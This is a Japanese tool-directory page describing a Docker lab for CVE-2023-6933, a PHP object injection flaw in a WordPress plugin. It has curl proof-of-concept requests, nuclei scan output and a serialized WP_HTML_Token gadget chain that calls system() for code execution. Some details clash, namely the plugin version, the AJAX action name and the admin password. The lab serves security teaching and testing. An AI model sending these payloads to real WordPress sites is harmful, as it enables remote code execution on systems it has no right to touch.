Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
vulnerable-bsr-lab-CVE-2023-6933 — CVE-2023-6933のハンズオンラボ。Better Search Replace WordPressプラグインのPHPオブジェクトインジェクション脆弱性に関するもので、Dockerデプロイ、nucleiテンプレート、およびセキュリティ研究と教育のためのエクスプロイトスクリプトを含みます。 | Kitploit
ツール/GitHubGitHub/trex96/vulnerable-bsr-lab-cve-2023-6933
エクスプロイトフレームワーク脆弱性分析ウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubtrex96/vulnerable-bsr-lab-cve-2023-6933

vulnerable-bsr-lab-CVE-2023-6933

CVE-2023-6933のハンズオンラボ。Better Search Replace WordPressプラグインのPHPオブジェクトインジェクション脆弱性に関するもので、Dockerデプロイ、nucleiテンプレート、およびセキュリティ研究と教育のためのエクスプロイトスクリプトを含みます。

リポジトリを見る
411ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-6933 脆弱性ラボ

概要

このラボ環境は、Better Search Replace WordPress プラグイン(バージョン ≤1.4.4)における重大な PHP オブジェクトインジェクション脆弱性 CVE-2023-6933 を実演します。

脆弱性の詳細

  • CVE ID: CVE-2023-6933
  • CVSS スコア: 9.8(緊急)
  • 影響を受けるプラグイン: Better Search Replace ≤1.4.4
  • 脆弱性タイプ: 非シリアル化されたユーザー入力による PHP オブジェクトインジェクション
  • 攻撃ベクトル: AJAX エンドポイント /wp-admin/admin-ajax.php、アクション search_replace_db

クイックスタート

1. ラボのデプロイ

root@kitploit:~
# リポジトリのクローン
git clone https://github.com/Trex96/vulnerable-bsr-lab-CVE-2023-6933.git
cd vulnerable-bsr-lab-CVE-2023-6933

# Docker Hub イメージを使用してデプロイ(自動プル)
docker-compose up -d

ラボは自動的に以下を実行します:

  • Docker Hub から脆弱な WordPress イメージをプル()
trex999/vulnerable-bsr-lab:latest
  • WordPress を MySQL と phpMyAdmin でセットアップ
  • 脆弱な Better Search Replace プラグイン(v1.4.4)をインストールして有効化
  • 約60秒でインストール完了
  • 2. 環境へのアクセス

    • WordPress: http://localhost:8080
    • 管理パネル: http://localhost:8080/wp-admin(admin/admin123)
    • phpMyAdmin: http://localhost:8081(root/rootpassword)

    3. 脆弱性のテスト

    root@kitploit:~
    # 自動化 PoC の実行
    nuclei -t nuclei-templates/cve-2023-6933.yaml -target http://localhost:8080 -v
    
    # curl による手動テスト
    curl -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
      -H "Content-Type: application/x-www-form-urlencoded" \
      -d 'action=search_replace_db&search_for=O:8:"stdClass":1:{s:6:"marker";s:34:"nuclei_test_payload_demonstration";}&replace_with=test'
    

    技術的分析

    脆弱性

    Better Search Replace プラグインは、その AJAX ハンドラに PHP オブジェクトインジェクションの脆弱性を含んでいます。脆弱性は以下の場合に発生します:

    1. ユーザー入力が search_for パラメータを介して POST で /wp-admin/admin-ajax.php に渡される
    2. アクションが search_replace_db に設定されている
    3. 入力にシリアル化された PHP オブジェクトが含まれており、適切な検証なしに非シリアル化される
    4. これにより、任意のオブジェクトのインスタンス化と潜在的なコード実行が可能になる

    PoC 確認方法

    当社の nuclei テンプレートは、複数の確認段階を通じて脆弱性を実証します:

    1. プラグイン検出:脆弱性のあるプラグインバージョンの存在を確認
    2. オブジェクトインジェクションテスト:シリアル化されたペイロードを送信し、レスポンスを分析
    3. 動作確認:オブジェクトの逆シリアル化処理が成功したことを確認

    このラボの主な特徴

    • エラーに依存しない:PoC はエラーメッセージではなく、動作分析を通じて実際の脆弱性を実証します
    • 機能テスト:安全なシリアル化されたオブジェクトを使用して、システムに損傷を与えずに逆シリアル化を確認します
    • 自動デプロイメント:手動設定不要の完全なラボセットアップ
    • 複数のテスト方法:自動化された nuclei テンプレートと手動 curl コマンドの両方を提供

    ドキュメンテーション

    クイックリファレンス

    • README.md:このファイル - クイックスタートと概要
    • CVE-2023-6933_POC_DOCUMENTATION.md:詳細な PoC 分析を含む完全な技術文書
    • POC_TEMPLATE_SUMMARY.md:要件の遵守状況と納品確認

    プロフェッショナル PoC テンプレート

    nuclei テンプレート(nuclei-templates/cve-2023-6933.yaml)はプロフェッショナルに構成されています:

    • 過剰なコメントのないクリーンなコード
    • 別ファイルでの包括的な技術文書
    • 本番環境対応のテンプレート形式
    • セキュリティ研究基準への完全準拠

    テスト結果

    PoC 実行の成功

    root@kitploit:~
    $ nuclei -t nuclei-templates/cve-2023-6933.yaml -target http://localhost:8080 -v
    
    [CVE-2023-6933:plugin_version] [http] [critical] http://localhost:8080/wp-content/plugins/better-search-replace/README.txt ["trunk"]
    [CVE-2023-6933:tested_up_to] [http] [critical] http://localhost:8080/wp-content/plugins/better-search-replace/README.txt ["6.4"]
    [CVE-2023-6933:response_content] [http] [critical] http://localhost:8080/wp-admin/admin-ajax.php ["0"]
    [CVE-2023-6933:poc_verification] [http] [critical] http://localhost:8080/wp-admin/admin-ajax.php ["0"]
    
    [INF] Scan completed in 67ms. 4 matches found.
    

    PoC は以下を成功裏に実証しました:

    • ✅ 脆弱なプラグインバージョンの検出
    • ✅ レスポンス分析によるオブジェクトインジェクション能力の確認
    • ✅ エラーに依存しない機能脆弱性の実証
    • ✅ 成功した逆シリアル化の動作確認

    セキュリティに関する注意

    ⚠️ 警告:この環境には意図的に脆弱なソフトウェアが含まれています。隔離されたテスト環境でのみ使用してください。本番環境やインターネットにアクセス可能なシステムにはデプロイしないでください。

    クリーンアップ

    root@kitploit:~
    docker-compose down -v
    

    参考情報

    • CVE-2023-6933 詳細
    • Better Search Replace プラグイン
    • PHP オブジェクトインジェクションのドキュメント

    教育およびセキュリティ研究目的で作成

    Docker 環境(Docker_LAB_SETUP/)

    • WordPress 6.4.0、脆弱な Better Search Replace 1.4.3 搭載
    • MySQL 8.0 データベースサーバー
    • phpMyAdmin データベース管理用
    • 事前設定済みの脆弱な環境

    エクスプロイトスクリプト

    • cve_2023_6933_exploit.php - 包括的な PHP エクスプロイトツールキット
    • wp_html_token_poc.php - WordPress 6.4.0+ の RCE 実証
    • bsr_direct_exploit.php - 直接脆弱性テスト

    検出ツール

    • nuclei-templates/cve-2023-6933.yaml - 高度な nuclei テンプレート
    • manual-test.sh - 包括的な手動テストスクリプト

    🎯 適切なエクスプロイト手法

    このラボでは、脆弱性研究のベストプラクティスに従ったエラーベースではない検出を実演します:

    1. 成功ベースの検出

    HTTP 500 エラーに依存する代わりに、当社のツールは以下を検出します:

    • ペイロード処理の成功
    • シリアル化されたオブジェクトの逆シリアル化
    • アプリケーションの応答パターン
    • 機能的なエクスプロイトの証拠

    2. WP_HTML_Token RCE チェーン

    WordPress 6.4.0+ の WP_HTML_Token クラスを実際の RCE に利用:

    root@kitploit:~
    O:13:"WP_HTML_Token":4:{
        s:13:"bookmark_name";s:14:"touch /tmp/rce";
        s:9:"node_name";s:8:"testnode";
        s:21:"has_self_closing_flag";b:0;
        s:10:"on_destroy";s:6:"system";
    }
    

    3. 複数の攻撃ベクトル

    • AJAX エンドポイントの悪用(admin-ajax.php)
    • プラグインインターフェースの直接操作
    • 検索/置換操作によるデータベースインジェクション

    🔬 テストアプローチ

    手動テスト

    root@kitploit:~
    # 基本的なプラグイン存在確認
    curl "http://localhost:8080/wp-content/plugins/better-search-replace/readme.txt"
    
    # 安全なペイロードで脆弱性テスト
    curl -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
      -d "action=bsr_search_replace&search_for=O:8:\"stdClass\":1:{s:4:\"test\";s:8:\"nuclei\";}&replace_with=safe&select_tables[]=wp_posts&dry_run=1"
    

    Nuclei テンプレートの特徴

    • マルチベクターテスト: 5 つの異なる HTTP リクエスト
    • 成功ベースのマッチャー: エラーではなく機能的な処理を探す
    • 包括的な抽出: バージョン検出、レスポンス分析
    • 安全なペイロード: 非破壊的なテストアプローチ

    手動テストの特徴

    • プラグインバージョンの検出と検証
    • 複数のペイロード生成とテスト
    • WP_HTML_Token RCE の実証
    • 包括的な脆弱性確認

    📊 ラブのアクセスポイント

    サービスURL認証情報
    WordPresshttp://localhost:8080admin/admin
    phpMyAdminhttp://localhost:8081root/rootpassword

    🛡️ セキュリティ上の考慮事項

    研究者向け

    • これは意図的に脆弱な環境です
    • 隔離された/制御されたネットワークでのみ使用してください
    • 本番環境には使用しないでください
    • 教育目的のみ

    防御者向け

    • Better Search Replace を ≥ 1.4.5 に更新してください
    • シリアル化されたデータに対する WAF ルールを実装してください
    • オブジェクトインジェクションパターンを監視してください
    • WordPress プラグインの定期的なセキュリティ監査を実施してください

    📚 教育的価値

    このラボでは、以下の実践的な経験を提供します:

    • PHP オブジェクトインジェクションの脆弱性
    • WordPress プラグインのセキュリティ分析
    • シリアル化/非シリアル化攻撃
    • ガジェットチェーンの悪用
    • 脆弱性検出の自動化
    • セキュリティテストの方法論

    作者: Trex
    ラボバージョン: 2.0 - 拡張 PoC 手法

    ツールをダウンロード